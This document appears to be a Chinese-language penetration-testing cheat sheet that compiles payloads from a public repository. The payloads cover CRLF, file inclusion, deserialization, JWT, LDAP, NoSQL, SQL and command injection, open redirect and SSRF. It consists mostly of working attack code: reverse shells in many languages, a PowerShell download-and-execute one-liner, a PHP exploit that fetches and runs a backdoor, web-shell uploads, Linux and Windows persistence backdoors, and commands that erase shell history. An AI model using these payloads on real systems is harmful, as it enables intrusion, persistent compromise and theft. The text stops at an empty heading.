滲透測試筆記
最近看到一個很不錯的倉庫,趁有時間,全部看了下做個筆記。
1、CRLF
CRLF - 新增cookie
http://www.example.com/%0D%0ASet-Cookie:mycookie=myvalue
CRLF - 繞過XSS
http://example.com/%0d%0aContent-Length:35%0d%0aX-XSS-Protection:0%0d%0a%0d%0a23%0d%0a<svg%20onload=alert(document.domain)>%0d%0a0%0d%0a/%2f%2e%2e
CRLF - 釣魚
http://www.example.com/index.php?lang=en%0D%0AContent-Length%3A%200%0A%20%0AHTTP/1.1%20200%20OK%0AContent-Type%3A%20text/html%0ALast-Modified%3A%20Mon%2C%2027%20Oct%202060%2014%3A50%3A18%20GMT%0AContent-Length%3A%2034%0A%20%0A%3Chtml%3EYou%20have%20been%20Phished%3C/html%3E
CRLF - Filter Bypass
使用UTF-8編碼: %E5%98%8A => %0A => \u560a %E5%98%8D => %0D => \u560d %E5%98%BE => %3E => \u563e (>) %E5%98%BC => %3C => \u563c (<) %E5%98%8A%E5%98%8Dcontent-type:text/html%E5%98%8A%E5%98%8Dlocation:%E5%98%8A%E5%98%8D%E5%98%8A%E5%98%8D%E5%98%BCsvg/onload=alert%28innerHTML%28%29%E5%98%BE
2、CSV Excel表示式注入
任何以'=','+','-','@'字元開頭的單元格都將被表格軟體解釋為公式 動態資料交換(Dynamic Data Exchange): =DDE(server; file; item; mode) Exploit: =DDE ("cmd";"/C calc";"!A0")A0 @SUM(1+1)*cmd|' /C calc'!A0
3、檔案包含
Linux
/etc/issue /etc/passwd /etc/shadow /etc/group /etc/hosts /etc/motd /etc/mysql/my.cnf /proc/PID/fd/檔案描述符 /proc/self/environ /proc/version /proc/cmdline /proc/sched_debug /proc/mounts /proc/net/arp /proc/net/route /proc/net/tcp /proc/net/udp
Windows
c:/boot.ini c:/inetpub/logs/logfiles c:/inetpub/wwwroot/global.asa c:/inetpub/wwwroot/index.asp c:/inetpub/wwwroot/web.config c:/sysprep.inf c:/sysprep.xml c:/sysprep/sysprep.inf c:/sysprep/sysprep.xml c:/system32/inetsrv/metabase.xml c:/sysprep.inf c:/sysprep.xml c:/sysprep/sysprep.inf c:/sysprep/sysprep.xml c:/system volume information/wpsettings.dat c:/system32/inetsrv/metabase.xml c:/unattend.txt c:/unattend.xml c:/unattended.txt c:/unattended.xml
log
/var/log/apache/access.log /var/log/apache/error.log /var/log/httpd/error_log /usr/local/apache/log/error_log /usr/local/apache2/log/error_log /var/log/vsftpd.log /var/log/sshd.log /var/log/mail
基本語法
http://example.com/index.php?page=../../../etc/passwd
00截斷
http://example.com/index.php?page=../../../etc/passwd%00
雙編碼
http://example.com/index.php?page=%252e%252e%252fetc%252fpasswd http://example.com/index.php?page=%252e%252e%252fetc%252fpasswd%00
目錄穿越
http://example.com/index.php?page=../../../../../../../../../etc/passwd..\.\.\.\.\.\.\.\.\.\.\[...]\.\. http://example.com/index.php?page=../../../../[…]../../../../../etc/passwd Bypass Filter: http://example.com/index.php?page=....//....//etc/passwd http://example.com/index.php?page=..///////..////..//////etc/passwd http://example.com/index.php?page=/%5C../%5C../%5C../%5C../%5C../%5C../%5C../%5C../%5C../%5C../%5C../etc/passwd
協議封裝
php://filter
http://example.com/index.php?page=php://filter/read=string.rot13/resource=index.php http://example.com/index.php?page=php://filter/convert.base64-encode/resource=index.php http://example.com/index.php?page=pHp://FilTer/convert.base64-encode/resource=index.php http://example.com/index.php?page=php://filter/convert.base64-encode|convert.base64-encode|convert.base64-encode/resource=index.php 連結大檔案: http://example.com/index.php?page=php://filter/zlib.deflate/convert.base64-encode/resource=/etc/passwd
zip://
echo "<pre><?php system($_GET['cmd']); ?></pre>" > payload.php; zip payload.zip payload.php; mv payload.zip shell.jpg; http://example.com/index.php?page=zip://shell.jpg%23payload.php
data://
http://example.com/index.php?page=data://text/plain;base64,PD9waHAgc3lzdGVtKCRfR0VUWydjbWQnXSk7Pz4= base64內容: "<?php system($_GET['cmd']);?>" 繞過xss防護 http://example.com/index.php?page=data:application/x-httpd-php;base64,PHN2ZyBvbmxvYWQ9YWxlcnQoMSk+ base64內容: <svg onload=alert(1)>
expect://
http://example.com/index.php?page=expect://id http://example.com/index.php?page=expect://ls
input://
http://example.com/index.php?page=php://input POST: <?php system('id'); ?>
phar://
// 建立一個Phar檔案 $phar = new Phar('test.phar'); $phar->startBuffering(); $phar->addFromString('test.txt', 'text'); $phar->setStub('<?php __HALT_COMPILER(); ? >'); // 新增元資料 class AnyClass {} $object = new AnyClass; $object->data = 'phar'; $phar->setMetadata($object); $phar->stopBuffering(); // 漏洞觸發 class AnyClass { function __destruct() { echo $this->data; } } // 輸出: phar include('phar://test.phar');
遠端命令執行
/proc/*/fd
1、上傳一些shell檔案(100+) 2、包含: http://example.com/index.php?page=/proc/$PID/fd/$FD $PID 程序號(可爆破) $FD 檔案描述符(可爆破)
/proc/self/environ
和日誌檔案一樣,在ua中傳送的payload,會記錄在/proc/self/environ檔案中 GET index.php?page=../../../proc/self/environ HTTP/1.1 User-Agent: <?=phpinfo(); ?>
檔案上傳
上傳一個包含惡意程式碼的任意格式的檔案,比如: <?php system($_GET['c']);?> http://example.com/index.php?page=path/to/upload/file.png
條件競爭
1、上傳一個檔案並觸發自包含 2、大量重複上傳來增加贏得競爭的機率和爆破的機率 3、對包含檔案進行爆破: /tmp/[0-9a-zA-Z]{6} // bruteforce_upload_race.py import itertools import requests import sys print('[+] Upload Trying...') f = {'file': open('shell.php', 'rb')} for _ in range(4096 * 4096): requests.post('http://target.com/index.php?c=index.php', f) print('[+] Bruteforcing...') for fname in itertools.combinations(string.ascii_letters + string.digits, 6): url = 'http://target.com/index.php?c=/tmp/php' + fname r = requests.get(url) if 'load average' in r.text:# <?php echo system('uptime'); print('[+] We have got a shell: ' + url) sys.exit(0) print('[x] Something went wrong, please try again')
phpinfo
ofollow,noindex">https://www.insomniasec.com/downloads/publications/phpinfolfi.py
4、不安全的反序列化
Java
Exploit:https://github.com/frohoff/ysoserial java -jar ysoserial.jar CommonsCollections1 calc.exe > commonpayload.bin java -jar ysoserial.jar Groovy1 calc.exe > groovypayload.bin java -jar ysoserial-master-v0.0.4-g35bce8f-67.jar Groovy1 'ping 127.0.0.1' > payload.bin java -jar ysoserial.jar Jdk7u21 bash -c 'nslookup `uname`.[redacted]' | gzip | base64 Burp Suite擴充套件: JavaSerialKiller Java Deserialization Scanner Burp-ysoserial SuperSerial SuperSerial-Active
PHP
<?php system('gnome-terminal -x sh -c \'nc -lvvp 2333\''); class PHPObjectInjection { public $inject = "system('wget http://127.0.0.1/backdoor.txt -O phpobjbackdoor.php && php phpobjbackdoor.php');"; } $url = 'http://localhost/xvwa/vulnerabilities/php_object_injection/?r='; $url = $url . urlencode(serialize(new PHPObjectInjection)); print "[+] Sending exploit...\r\n"; $response = file_get_contents("$url"); ?>
Python
import cPickle from base64 import b64encode, b64decode class Evil(object): def __reduce__(self): return (os.system,("whoami",)) e = Evil() evil_token = b64encode(cPickle.dumps(e)) print("Your Evil Token : {}").format(evil_token)
Ruby
for i in { 0..5 }; do docker run - it ruby: 2. $ { i } ruby - e 'Marshal.load(["0408553a1547656d3a3a526571756972656d656e745b066f3a1847656d3a3a446570656e64656e63794c697374073a0b4073706563735b076f3a1e47656d3a3a536f757263653a3a537065636966696346696c65063a0a40737065636f3a1b47656d3a3a5374756253706563696669636174696f6e083a11406c6f616465645f66726f6d49220d7c696420313e2632063a0645543a0a4064617461303b09306f3b08003a1140646576656c6f706d656e7446"].pack("H*")) rescue nil'; done
5、JWT(JSON Web Token)
格式: Base64(Header).Base64(Data).Base64(Signature) Example: eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJzdWIiOiIxMjM0NTY3ODkwIiwibmFtZSI6IkFtYXppbmcgSGF4eDByIiwiZXhwIjoiMTQ2NjI3MDcyMiIsImFkbWluIjp0cnVlfQ.UL9Pz5HbaMdZCV9cS9OcpccjrlkcmLovL2A2aiKiAOY JWT線上加解密:https://www.jsonwebtoken.io/ JWT利用工具: jwt_tool git clone https://github.com/ticarpi/jwt_tool > python jwt_tool.py eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9.eyJsb2dpbiI6InRpY2FycGkifQ.aqNCvShlNT9jBFTPBpHDbt2gBB1MyHiisSDdp8SQvgw result.txt c-jwt-cracker git clone https://github.com/brendan-rius/c-jwt-cracker >./jwtcrack eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJzdWIiOiIxMjM0NTY3ODkwIiwibmFtZSI6IkpvaG4gRG9lIiwiYWRtaW4iOnRydWV9.cAOIAifu3fykvhkHpbuhbvtH807-Z2rI1FS3vX1XMjE > Secret is "Sn1f" Hashcat hashcat -m 16500 hash.txt -a 3 -w 3 ?a?a?a?a?a?a eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJzdWIiOiIxMj...Fh7HgQ:secret
6、LDAP注入
Example 1: user= *)(uid=*))(|(uid=* pass= password query = "(&(uid=*)(uid=*)) (|(uid=*)(userPassword=MD5(password}))" Example 2: user= admin)(!(&(1=0 pass= q)) query = (&(uid=admin)(!(&(1=0)(userPassword=q)))) 攻擊Payload: * *)(& *))%00 )(cn=))\x00 *()|%26' *()|&' *(|(mail=*)) *(|(objectclass=*)) *)(uid=*))(|(uid=* */* *| / // //* @* | admin* admin*)((|userpassword=*) admin*)((|userPassword=*) x' or name()='username' or 'x'='y 預設屬性: // *)(ATTRIBUTE_HERE=* userPassword surname name cn sn objectClass mail givenName commonName
7、Linux-持久控制
基本反彈shell
ncat --udp -lvp 2333 ncat --tcp -lvp 2333 ncat --sctp -lvp 2333
SUID
TMPDIR="/var/tmp" echo 'int main(void){setresuid(0, 0, 0);system("/bin/sh");}' > $TMPDIR/suidshell.c gcc $TMPDIR/suidshell.c -o $TMPDIR/suidshell 2>/dev/null chown root:root $TMPDIR/suidshell chmod 4777 $TMPDIR/suidshell
Crontab
(crontab -l ; echo "@reboot sleep 200 && ncat 192.168.1.2 4242 -e /bin/bash")|crontab 2> /dev/null
啟動服務
RSHELL="ncat $LMTHD $LHOST $LPORT -e \"/bin/bash -c id;/bin/bash\" 2>/dev/null" sed -i -e "4i \$RSHELL" /etc/network/if-up.d/upstart
啟動檔案
Linux, write a file in ~/.config/autostart/NOM_OF_FILE.desktop In : ~/.config/autostart/*.desktop [Desktop Entry] Type=Application Name=Welcome Exec=/var/lib/gnome-welcome-tour AutostartCondition=unless-exists ~/.cache/gnome-getting-started-docs/seen-getting-started-guide OnlyShowIn=GNOME; X-GNOME-Autostart-enabled=false
驅動程式
echo "ACTION==\"add\",ENV{DEVTYPE}==\"usb_device\",SUBSYSTEM==\"usb\",RUN+=\"$RSHELL\"" | tee /etc/udev/rules.d/71-vbox-kernel-drivers.rules > /dev/null
Tips
1、使用ANSI字元隱藏payload 2、清除歷史命令 export HISTSIZE=0 export HISTFILESIZE=0 unset HISTFILE; CTRL-D or kill -9 $$ or echo "" > ~/.bash_history or rm ~/.bash_history -rf or history -c or ln /dev/null ~/.bash_history -sf 3、以下臨時目錄通常是可寫的 /var/tmp/ /tmp/ /dev/shm/
8、Windows-持久控制
登錄檔
在HKCU\Software\Microsoft\Windows的Run中建立REG_SZ 名稱:Backdoor 值:C:\Users\test\AppData\Local\Temp\backdoor.exe 與HKCU一樣,在HKLM\Software\Microsoft\Windows的Run鍵中建立REG_SZ 名稱:Backdoor 值:C:\Windows\Temp\backdoor.exe
啟動項
在使用者啟動資料夾中建立批處理指令碼 PS C:\> gc C:\Users\test\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\backdoor.bat start /b C:\Users\test\AppData\Local\Temp\backdoor.exe
計劃任務
PS C:\> $A = New-ScheduledTaskAction -Execute "cmd.exe" -Argument "/c C:\Windows\Temp\backdoor.exe" PS C:\> $T = New-ScheduledTaskTrigger -Daily -At 9am PS C:\> $P = New-ScheduledTaskPrincipal "NT AUTHORITY\SYSTEM" -RunLevel Highest PS C:\> $S = New-ScheduledTaskSettingsSet PS C:\> $D = New-ScheduledTask -Action $A -Trigger $T -Principal $P -Settings $S PS C:\> Register-ScheduledTask Backdoor -InputObject $D
服務
PS C:\> New-Service -Name "Backdoor" -BinaryPathName "C:\Windows\Temp\backdoor.exe" -Description "Nothing to see here."
9、網路轉發
Windows netsh
netsh interface portproxy add v4tov4 listenaddress=localaddress listenport=localport connectaddress=destaddress connectport=destport netsh interface portproxy add v4tov4 listenport=3340 listenaddress=10.1.1.110 connectport=3389 connectaddress=10.1.1.110 1、listenaddress – 等待連線的本地IP地址 2、listenport – 本地等待連線的監聽埠 3、connectaddress – 將連線重定向到的遠端IP地址 4、connectport – 將listenport連線轉發到此埠
SSH
SOCKS代理
ssh -N -f -D 9000 [user]@[host] -f : ssh in background -N : do not execute a remote command
本地埠轉發
ssh -L [bindaddr]:[port]:[dsthost]:[dstport] [user]@[host]
遠端埠轉發
ssh -R [bindaddr]:[port]:[localhost]:[localport] [user]@[host]
Proxychains
1、Config file: /etc/proxychains.conf [ProxyList] socks4 localhost 8080 2、proxychains nmap -sT 192.168.5.6
Web SOCKS - reGeorg
https://github.com/sensepost/reGeorg python reGeorgSocksProxy.py -p 8080 -u http://compromised.host/shell.jsp
Metasploit
portfwd list portfwd add -L 0.0.0.0 -l 445 -r 192.168.57.102 -p 445 or run autoroute -s 192.168.57.0/24 use auxiliary/server/socks4a
10、反彈shell
Bash TCP
bash -i >& /dev/tcp/<IP>/<PORT> 0>&1 0<&196;exec 196<>/dev/tcp/<IP>/<PORT>; sh <&196 >&196 2>&196
Bash UDP
肉雞: sh -i >& /dev/udp/127.0.0.1/4242 0>&1 攻擊機: nc -u -lvp 4242
Perl
perl -e 'use Socket;$i="10.0.0.1";$p=1234;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh -i");};' perl -MIO -e '$p=fork;exit,if($p);$c=new IO::Socket::INET(PeerAddr,"[IPADDR]:[PORT]");STDIN->fdopen($c,r);$~->fdopen($c,w);system$_ while<>;' NOTE: Windows only perl -MIO -e '$c=new IO::Socket::INET(PeerAddr,"[IPADDR]:[PORT]");STDIN->fdopen($c,r);$~->fdopen($c,w);system$_ while<>;'
Python
Linux
python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("127.0.0.1",4444));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);import pty; pty.spawn("/bin/bash")' python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("10.0.0.1",1234));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'
Windows
python -c "(lambda __y, __g, __contextlib: [[[[[[[(s.connect(('10.11.0.37', 4444)), [[[(s2p_thread.start(), [[(p2s_thread.start(), (lambda __out: (lambda __ctx: [__ctx.__enter__(), __ctx.__exit__(None, None, None), __out[0](lambda: None)][2])(__contextlib.nested(type('except', (), {'__enter__': lambda self: None, '__exit__': lambda __self, __exctype, __value, __traceback: __exctype is not None and (issubclass(__exctype, KeyboardInterrupt) and [True for __out[0] in [((s.close(), lambda after: after())[1])]][0])})(), type('try', (), {'__enter__': lambda self: None, '__exit__': lambda __self, __exctype, __value, __traceback: [False for __out[0] in [((p.wait(), (lambda __after: __after()))[1])]][0]})())))([None]))[1] for p2s_thread.daemon in [(True)]][0] for __g['p2s_thread'] in [(threading.Thread(target=p2s, args=[s, p]))]][0])[1] for s2p_thread.daemon in [(True)]][0] for __g['s2p_thread'] in [(threading.Thread(target=s2p, args=[s, p]))]][0] for __g['p'] in [(subprocess.Popen(['\\windows\\system32\\cmd.exe'], stdout=subprocess.PIPE, stderr=subprocess.STDOUT, stdin=subprocess.PIPE))]][0])[1] for __g['s'] in [(socket.socket(socket.AF_INET, socket.SOCK_STREAM))]][0] for __g['p2s'], p2s.__name__ in [(lambda s, p: (lambda __l: [(lambda __after: __y(lambda __this: lambda: (__l['s'].send(__l['p'].stdout.read(1)), __this())[1] if True else __after())())(lambda: None) for __l['s'], __l['p'] in [(s, p)]][0])({}), 'p2s')]][0] for __g['s2p'], s2p.__name__ in [(lambda s, p: (lambda __l: [(lambda __after: __y(lambda __this: lambda: [(lambda __after: (__l['p'].stdin.write(__l['data']), __after())[1] if (len(__l['data']) > 0) else __after())(lambda: __this()) for __l['data'] in [(__l['s'].recv(1024))]][0] if True else __after())())(lambda: None) for __l['s'], __l['p'] in [(s, p)]][0])({}), 's2p')]][0] for __g['os'] in [(__import__('os', __g, __g))]][0] for __g['socket'] in [(__import__('socket', __g, __g))]][0] for __g['subprocess'] in [(__import__('subprocess', __g, __g))]][0] for __g['threading'] in [(__import__('threading', __g, __g))]][0])((lambda f: (lambda x: x(x))(lambda y: f(lambda: y(y)()))), globals(), __import__('contextlib'))"
PHP
php -r '$sock=fsockopen("10.0.0.1",1234);exec("/bin/sh -i <&3 >&3 2>&3");'
Ruby
ruby -rsocket -e'f=TCPSocket.open("10.0.0.1",1234).to_i;exec sprintf("/bin/sh -i <&%d >&%d 2>&%d",f,f,f)' ruby -rsocket -e 'exit if fork;c=TCPSocket.new("[IPADDR]","[PORT]");while(cmd=c.gets);IO.popen(cmd,"r"){|io|c.print io.read}end' NOTE: Windows only ruby -rsocket -e 'c=TCPSocket.new("[IPADDR]","[PORT]");while(cmd=c.gets);IO.popen(cmd,"r"){|io|c.print io.read}end'
nc
ncat 127.0.0.1 4444 -e /bin/bash ncat --udp 127.0.0.1 4444 -e /bin/bash
Powershell
1、powershell -NoP -NonI -W Hidden -Exec Bypass -Command New-Object System.Net.Sockets.TCPClient("[IPADDR]",[PORT]);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2= $sendback + "PS " + (pwd).Path + "> ";$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close() 2、powershell -nop -c "$client = New-Object System.Net.Sockets.TCPClient('10.1.3.40',443);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2 = $sendback + 'PS ' + (pwd).Path + '> ';$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()" 3、powershell IEX (New-Object Net.WebClient).DownloadString('https://gist.githubusercontent.com/staaldraad/204928a6004e89553a8d3db0ce527fd5/raw/fe5f74ecfae7ec0f2d50895ecf9ab9dafe253ad4/mini-reverse.ps1')
Awk
awk 'BEGIN {s = "/inet/tcp/0/<IP>/<PORT>"; while(42) { do{ printf "shell>" |& s; s |& getline c; if(c){ while ((c |& getline) > 0) print $0 |& s; close(c); } } while(c != "exit") close(s); }}' /dev/null
Java
r = Runtime.getRuntime() p = r.exec(["/bin/bash","-c","exec 5<>/dev/tcp/10.0.0.1/2002;cat <&5 | while read line; do \$line 2>&5 >&5; done"] as String[]) p.waitFor()
NodeJS
require('child_process').exec('nc -e /bin/sh [IPADDR] [PORT]') or -var x = global.process.mainModule.require -x('child_process').exec('nc [IPADDR] [PORT] -e /bin/bash') or https://gitlab.com/0x4ndr3/blog/blob/master/JSgen/JSgen.py
11、NoSQL注入
Exploit
使用$ne、$gt繞過認證 in URL username[$ne]=toto&password[$ne]=toto in JSON {"username": {"$ne": null}, "password": {"$ne": null} } {"username": {"$ne": "foo"}, "password": {"$ne": "bar"} } {"username": {"$gt": undefined}, "password": {"$gt": undefined} } 獲取長度 username[$ne]=toto&password[$regex]=.{1} username[$ne]=toto&password[$regex]=.{3} 獲取資料 in URL username[$ne]=toto&password[$regex]=m.{2} username[$ne]=toto&password[$regex]=md.{1} username[$ne]=toto&password[$regex]=mdp or username[$ne]=toto&password[$regex]=m.* username[$ne]=toto&password[$regex]=md.* in JSON {"username": {"$eq": "admin"}, "password": {"$regex": "^m" }} {"username": {"$eq": "admin"}, "password": {"$regex": "^md" }} {"username": {"$eq": "admin"}, "password": {"$regex": "^mdp" }}
NoSQL盲注
import requests import urllib3 import string import urllib urllib3.disable_warnings() username="admin" password="" while True: for c in string.printable: if c not in ['*','+','.','?','|']: payload='{"username": {"$eq": "%s"}, "password": {"$regex": "^%s" }}' % (username, password + c) r = requests.post(u, data = {'ids': payload}, verify = False) if 'OK' in r.text: print("Found one more char : %s" % (password+c)) password += c
MongoDB Payloads
true, $where: '1 == 1' , $where: '1 == 1' $where: '1 == 1' ', $where: '1 == 1' 1, $where: '1 == 1' { $ne: 1 } ', $or: [ {}, { 'a':'a ' } ], $comment:'successful MongoDB injection' db.injection.insert({success:1}); db.injection.insert({success:1});return 1;db.stores.mapReduce(function() { { emit(1,1 || 1==1 ' && this.password.match(/.*/)//+%00 ' && this.passwordzz.match(/.*/)//+%00 '%20%26%26%20this.password.match(/.*/)//+%00 '%20%26%26%20this.passwordzz.match(/.*/)//+%00 {$gt: ''} [$ne]=1
12、開放重定向
Exploit
1、使用白名單繞過 www.whitelisted.com.evil.com 2、使用'CRLF'繞過'javascript'黑名單關鍵字 java%0d%0ascript%0d%0a:alert(0) 3、使用'//'繞過'http'黑名單關鍵字 //baidu.com 4、使用'https'繞過'//'黑名單關鍵字 https:baidu.com 5、使用'\/\/'繞過'//'黑名單關鍵字 \/\/baidu.com/ /\/baidu.com/ 6、使用'%E3%80%82'繞過'.'黑名單關鍵字 //baidu%E3%80%82com 7、使用'%00'繞過黑名單 //baidu%00.com 8、使用引數汙染繞過 ?next=whitelisted.com&next=baidu.com 9、使用'@'繞過 http://[email protected]/ 10、使用目錄繞過 http://www.baidu.com/http://www.whitelisted.com/ http://www.baidu.com/folder/www.whitelisted.com 11、XSS by Open URL(如果在js變數中) ";alert(0);// 12、XSS by data協議 http://www.example.com/redirect.php?url=data:text/html;base64,PHNjcmlwdD5hbGVydCgiWFNTIik7PC9zY3JpcHQ+Cg== 13、XSS by javascript協議 http://www.example.com/redirect.php?url=javascript:prompt(1)
通用引數
/{payload} ?next={payload} ?url={payload} ?target={payload} ?rurl={payload} ?dest={payload} ?destination={payload} ?redir={payload} ?redirect_uri={payload} ?redirect_url={payload} ?redirect={payload} /redirect/{payload} /cgi-bin/redirect.cgi?{payload} /out/{payload} /out?{payload} ?view={payload} /login?to={payload} ?image_url={payload} ?go={payload} ?return={payload} ?returnTo={payload} ?return_to={payload} ?checkout_url={payload} ?continue={payload} ?return_path={payload}
13、遠端命令執行
連線符
ps;ls ps&ls ps&&ls ps|ls fail_command||ls
內嵌命令
other_command `cat /etc/passwd` other_command $(cat /etc/passwd)
繞過空格-Linux
cat</etc/passwd {cat,/etc/passwd} cat$IFS/etc/passwd echo${IFS}"RCE"${IFS}&&cat${IFS}/etc/passwd X=$'uname\x20-a'&&$X sh</dev/tcp/127.0.0.1/80 IFS=,;`cat<<<uname,-a`
繞過空格-Windows
ping%CommonProgramFiles:~10,-18%IP ping%PROGRAMFILES:~10,-5%IP
萬用字元
常用萬用字元 * ? [] [-] [^] [!] {str1,str2,…} 專用字符集 ... /???/??t /???/p??s??
繞過zsh/bash/sh
echo $0 -> /usr/bin/zsh echo whoami|$0
其他繞過
單引號 w'h'o'am'i 雙引號 w"h"o"am"i 反斜槓和斜槓 w\ho\am\i /\b\i\n/////s\h 使用$@ who$@ami 擴充套件變數 test=/ehhh/hmtc/pahhh/hmsswd cat ${test//hhh\/hm/} cat ${test//hh??hm/}
14、SQL注入
- MSSQL 注入
- MySQL%20Injection.md" target="_blank" rel="nofollow,noindex">MySQL 注入
- OracleSQL 注入
- PostgreSQL%20Injection.md" target="_blank" rel="nofollow,noindex">PostgreSQL 注入
- SQLite 注入
檢測點
' %27 " %22 # %23 ; %3B ) Wildcard (*) %%2727 %25%27 `+HERP '||'DERP '+'herp ' 'DERP '%20'HERP '%2B'HERP
DBMS識別
["conv('a',16,2)=conv('a',16,2)","MYSQL"] ["connection_id()=connection_id()","MYSQL"] ["crc32('MySQL')=crc32('MySQL')","MYSQL"] ["BINARY_CHECKSUM(123)=BINARY_CHECKSUM(123)","MSSQL"] ["@@CONNECTIONS>0","MSSQL"] ["@@CONNECTIONS=@@CONNECTIONS","MSSQL"] ["@@CPU_BUSY=@@CPU_BUSY","MSSQL"] ["USER_ID(1)=USER_ID(1)","MSSQL"] ["ROWNUM=ROWNUM","ORACLE"] ["RAWTOHEX('AB')=RAWTOHEX('AB')","ORACLE"] ["LNNVL(0=123)","ORACLE"] ["5::int=5","POSTGRESQL"] ["5::integer=5","POSTGRESQL"] ["pg_client_encoding()=pg_client_encoding()","POSTGRESQL"] ["get_current_ts_config()=get_current_ts_config()" ,"POSTGRESQL"] ["quote_literal(42.5)=quote_literal(42.5)","POSTGRESQL"] ["current_database()=current_database()","POSTGRESQL"] ["sqlite_version()=sqlite_version()","SQLITE"] ["last_insert_rowid()>1","SQLITE"] ["last_insert_rowid()=last_insert_rowid()","SQLITE"] ["val(cvar(1))=1","MSACCESS"] ["IIF(ATN(2)>0,1,0) BETWEEN 2 AND 0","MSACCESS"] ["cdbl(1)=cdbl(1)","MSACCESS"] ["1337=1337","MSACCESS,SQLITE,POSTGRESQL,ORACLE,MSSQL,MYSQL"] ["'i'='i'","MSACCESS,SQLITE,POSTGRESQL,ORACLE,MSSQL,MYSQL"]
SQLmap自動化攻擊
sqlmap -u "http://example.com/" --crawl=1 --random-agent --batch --forms --threads=5 --level=5 --risk=3
認證繞過
'-' ' ' '&' '^' '*' ' or 1=1 limit 1 -- -+ '="or' ' or ''-' ' or '' ' ' or ''&' ' or ''^' ' or ''*' '-||0' "-||0" "-" " " "&" "^" "*" " or ""-" " or "" " " or ""&" " or ""^" " or ""*" or true-- " or true-- ' or true-- ") or true-- ') or true-- ' or 'x'='x ') or ('x')=('x ')) or (('x'))=(('x " or "x"="x ") or ("x")=("x ")) or (("x"))=(("x or 2 like 2 or 1=1 or 1=1-- or 1=1# or 1=1/* admin' -- admin' # admin'/* admin' or '2' LIKE '1 admin' or 2 LIKE 2-- admin' or 2 LIKE 2# admin') or 2 LIKE 2# admin') or 2 LIKE 2-- admin') or ('2' LIKE '2 admin') or ('2' LIKE '2'# admin') or ('2' LIKE '2'/* admin' or '1'='1 admin' or '1'='1'-- admin' or '1'='1'# admin' or '1'='1'/* admin'or 1=1 or ''=' admin' or 1=1 admin' or 1=1-- admin' or 1=1# admin' or 1=1/* admin') or ('1'='1 admin') or ('1'='1'-- admin') or ('1'='1'# admin') or ('1'='1'/* admin') or '1'='1 admin') or '1'='1'-- admin') or '1'='1'# admin') or '1'='1'/* 1234 ' AND 1=0 UNION ALL SELECT 'admin', '81dc9bdb52d04dc20036dbd8313ed055 admin" -- admin" # admin"/* admin" or "1"="1 admin" or "1"="1"-- admin" or "1"="1"# admin" or "1"="1"/* admin"or 1=1 or ""=" admin" or 1=1 admin" or 1=1-- admin" or 1=1# admin" or 1=1/* admin") or ("1"="1 admin") or ("1"="1"-- admin") or ("1"="1"# admin") or ("1"="1"/* admin") or "1"="1 admin") or "1"="1"-- admin") or "1"="1"# admin") or "1"="1"/* 1234 " AND 1=0 UNION ALL SELECT "admin", "81dc9bdb52d04dc20036dbd8313ed055
認證繞過(Raw MD5)
Example: "SELECT * FROM admin WHERE pass = '".md5($password,true)."'" 我們只有找到md5($password,true)中包含' or '[...]的字元即可 md5("ffifdyop", true) = 'or'6�]��!r,��b�
waf繞過
繞過空格 ?id=1%09and%091=1%09-- ?id=1%0Dand%0D1=1%0D-- ?id=1%0Cand%0C1=1%0C-- ?id=1%0Band%0B1=1%0B-- ?id=1%0Aand%0A1=1%0A-- ?id=1%A0and%A01=1%A0-- 註釋 ?id=1/*comment*/and/**/1=1/**/-- 括號 ?id=(1)and(1)=(1)-- 繞過逗號 LIMIT 0,1-> LIMIT 1 OFFSET 0 SUBSTR('SQL',1,1) -> SUBSTR('SQL' FROM 1 FOR 1). SELECT 1,2,3,4-> UNION SELECT * FROM (SELECT 1)a JOIN (SELECT 2)b JOIN (SELECT 3)c JOIN (SELECT 4)d 等效符 AND-> && OR-> || =-> LIKE,REGEXP, not < and not > > X-> not between 0 and X WHERE -> HAVING 繞過information_schema.tables select * from mysql.innodb_table_stats; // select @@innodb_version;
15、SSRF
Exploit
可以利用SSRF攻擊內網redis、discuz、fastcgi、uwsgi、memcache、struts2、內網系統、docker、Kubernetes、Hadoop、mysql等等 1、基本利用 http://localhost:80 http://0.0.0.0:22 2、利用重定向 設定一個子域名的DNS A記錄為需要探測的內網IP,eg:127.0.0.1 http://wwww.example.com/index.php?url=http://ssrf.w2n1ck.com 3、利用檔案上傳 修改"type=file"為"type=url" 然後加入內網地址即可 4、XSS http://brutelogic.com.br/poc.svg -> simple alert http://wwww.example.com/index.php?url=http://brutelogic.com.br/poc.svg
Bypass
